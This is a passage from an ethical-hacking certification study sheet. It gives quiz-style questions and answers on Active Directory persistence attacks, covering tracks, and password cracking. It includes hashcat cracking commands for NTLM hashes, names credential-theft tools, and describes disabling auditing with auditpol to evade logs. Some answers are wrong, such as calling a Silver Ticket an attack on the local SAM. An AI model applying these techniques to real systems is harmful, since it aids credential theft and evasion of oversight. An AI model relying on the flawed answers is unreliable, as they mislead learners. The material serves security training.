ADS = ?Alternate Data Streams (NTFS)
Dir command to view ADS?dir /r
Hiding an image inside another image?Steganography

16.6 Persistence

QuestionAnswer
Attack against the local SAM with Mimikatz?Silver Ticket attack
Total domain access via the KRBTGT account?Golden Ticket attack
Modify credentials of any AD account?Skeleton Key attack
Replication via DCSync targeting KRBTGT?Malicious replication
AD container that propagates rights?AdminSDHolder

16.7 Covering Tracks

QuestionAnswer
Forensic investigation tracing back to the attacker?Traceback
Difference between good vs expert attacker on logs?Expert: disables auditing before acting
Windows command to disable auditing?auditpol
Linux command to view history?history
First event after clearing a Windows log?”Log Cleared” event

16.8 Tools and Hashcat

QuestionAnswer
Hashcat for NTLM?hashcat -m 1000 -a 0 hash.txt wordlist.txt
Hashcat for NTLMv2 (Responder)?hashcat -m 5600 -a 0 hash.txt wordlist.txt
Hashcat brute-force mode?-a 3
Hashcat dictionary mode?-a 0
Hashcat hybrid wordlist + mask mode?-a 6
Tool to capture NTLMv2 via LLMNR?Responder
How to disable LLMNR?Via GPO
Kali tool to extract in-memory credentials?Mimikatz
Post-exploitation Linux enumeration tool?LinPEAS
Catalog of abusable Unix binaries?GTFOBins (gtfobins.github.io)

Next course: Malware Threats
GTFOBins: gtfobins.github.io
HaveIBeenPwned: haveibeenpwned.com


Search Terms

ceh · ethical · hacking · system · systems · cybersecurity · networking · security · types · access · attack · escalation · tools · cracking · essential · password · passwords · tracks · attacker · chm · commands · covering · gaining · persistence

Interested in this course?

Contact us to book it or get a custom training plan for your team.